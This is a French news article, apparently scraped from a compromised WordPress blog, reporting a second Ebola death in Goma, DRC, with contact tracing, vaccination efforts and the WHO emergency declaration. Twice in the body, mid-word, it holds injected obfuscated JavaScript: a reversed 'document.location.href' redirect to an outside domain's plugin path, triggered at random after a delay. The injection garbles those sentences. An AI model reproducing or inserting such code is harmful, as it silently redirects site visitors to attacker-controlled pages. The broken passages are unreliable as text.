AFRIQUESANTESANTE POUR FEMMESSANTE POUR HOMMES

RDC Congo: Épidémie d’Ebola: un 2ème décès à Goma.

Le virus Ebola a fait une deuxième victime dans l’est de la République démocratique du Congo… Un patient décédé à Goma, dans la nuit de mardi à mercredi quelques heures après son admission au centre de soins spécialisés.

C’est le deuxième décès lié à Ebola, en moins de trois semaines dans la grtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}ande métropole de l’est congolais.

Les autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}torités tentent de rassurer la population, en soulignant les efforts pour circonscrire l’épidémie.

« On a déjà fait la liste des contacts à haut risque, a expliqué Jean-Jacques Muyembe, coordinateur national de la riposte contre l’épidémie. Et dès (ce mercredi), on commencera à faire la liste des contacts de contacts. Et ces contacts seront vaccinés avec les vaccins qui se trouvent déjà sur place. »

Un an d’épidémie, et d’inquiétudes

Cela fait un an que cette région est confrontée à l’épidémie, qui a déjà fait 1800 morts en 12 mois.

La difficulté des médecins, en plus de la soigner la maladie, c’est de convaincre la population du bien-fondé du vaccin, et de la nécessité d’une hospitalisation dès les premiers symptômes.
L’Organisation mondiale de la Santé (OMS) a fait de l’épidémie d’Ebola une “urgence de santé publique de portée internationale” après la découverte d’un premier cas mi-juillet à Goma.

Source: Euronews

%d blogueurs aiment cette page :